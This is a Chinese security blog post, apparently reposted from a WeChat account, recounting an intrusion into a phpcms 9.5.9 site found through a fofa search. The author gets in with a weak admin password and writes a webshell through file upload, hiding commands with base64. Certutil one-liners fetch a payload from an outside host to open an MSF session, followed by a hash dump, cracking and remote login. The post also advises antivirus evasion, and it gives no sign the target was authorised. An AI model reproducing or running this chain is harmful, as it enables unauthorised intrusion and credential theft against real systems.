记录一次从弱口令到远程登陆

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享   #MSF


该目标起源于,通过fofa搜索“xx网络”,然后通过弱口令拿到了该后台权限,在后台发现这套系统为phpcms 9.5.9

记录一次从弱口令到远程登陆


于是看看网上有没有历史漏洞,同时也问了一下好友@RG师傅,他找到一个历史漏洞文章

  • https://www.cnblogs.com/str1ve/p/13381676.html


我们在用户->管理会员->添加会员模块中进行文件上传

记录一次从弱口令到远程登陆


这是a.txt的内容,通过file_put_contents进行文件写入

记录一次从弱口令到远程登陆

但是这样文件上传会有一个问题,就是他这里可能会拦截或者解析不到你的命令,只能解析phpinfo()
记录一次从弱口令到远程登陆

但是如果执行别的命令就不行,比如whoami
记录一次从弱口令到远程登陆

考虑把内容进行base64编码一下试试
记录一次从弱口令到远程登陆

然后执行命令,就没有报错了,我们执行命令也要记得base64编码一下
记录一次从弱口令到远程登陆

既然可以执行命令,我这里尝试了hta上线和powershell上线,可能因为机器是腾讯云的缘故给我拦截了,于是请教了3h师傅,他和我说可以使用Windows系统中的Certutil/Bitsadmin/Powershell等命令来下载文件,命令是3h师傅整理的,在这里贴出来


Certutil:

  • %USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

下载文件:certutil -urlcache -split -f http://192.168.1.108/payload.exe C:ProgramDatapayload.execertutil -urlcache -split -f http://192.168.1.108/base64.txt b64 & certutil -decode b64 C:ProgramDatapayload.exe & del b64
删除指定缓存:certutil -urlcache -split -f http://192.168.1.108/base64.txt delete
查看所有缓存:certutil -urlcache *
删除所有缓存:certutil -urlcache * delete


于是使用CertUtil远程文件下载,首先看一下当前文件路径,然后将命令编码一下再执行。

记录一次从弱口令到远程登陆
记录一次从弱口令到远程登陆


再次进行编码执行刚刚下载的文件得到MSF会话!

记录一次从弱口令到远程登陆
记录一次从弱口令到远程登陆


抓明文,但是抓不到

记录一次从弱口令到远程登陆

因为网站是phpstudy搭建,权限比较高,我们可以直接导出hash
记录一次从弱口令到远程登陆


解密hash

记录一次从弱口令到远程登陆

接下来远程登陆
记录一次从弱口令到远程登陆


总结:内网这块是3h师傅负责打的,思路很明确,当初在命令执行的时候考虑过直接创建用户,但是失败了就没再考虑,能执行系统命令的时候可以使用Windows自带的文件来下载工具,如目标有杀软时请自行做下免杀处理




只需在公众号回复“9527”即可领取一套HTB靶场学习文档和视频,1120领取安全参考等安全杂志PDF电子版1208领取一份常用高效爆破字典还在等什么?

记录一次从弱口令到远程登陆

本文始发于微信公众号(潇湘信安):记录一次从弱口令到远程登陆

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: